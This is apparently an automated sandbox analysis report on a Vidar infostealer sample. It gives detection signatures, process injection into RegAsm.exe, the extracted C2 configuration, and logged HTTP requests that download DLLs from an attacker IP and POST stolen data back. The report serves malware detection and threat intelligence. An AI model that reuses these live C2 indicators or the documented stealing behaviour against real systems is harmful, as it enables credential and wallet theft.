Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1431181
MD5:	fcc226702f89fb80675c9b20156500f3
SHA1:	0f8b46119867e39e95de3b2f3b1aaa9784c2664d
SHA256:	c84f8c3f58c2d8193d9f78cffb67205037b48b66c1287e06413f11cbe0e16038
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FCC226702F89FB80675C9B20156500F3)

RegAsm.exe (PID: 4904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 2640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 340 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7100	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4904	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4904	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4904	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.230000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00406F90 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00406F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00409330 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	1_2_00409330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004117A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	1_2_004117A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00406F10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00406F10

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 96.17.209.196:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.246.168:443 -> 192.168.2.4:49733 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: C:\w7u2b6tslydotp\Body.pdb source: file.exe
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002C97DC FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_002C97DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002C9B02 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_002C9B02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	1_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	1_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

1_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199677575543

Source: global traffic

HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 5753Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 130205Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00404490 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00404490

Source: global traffic	HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
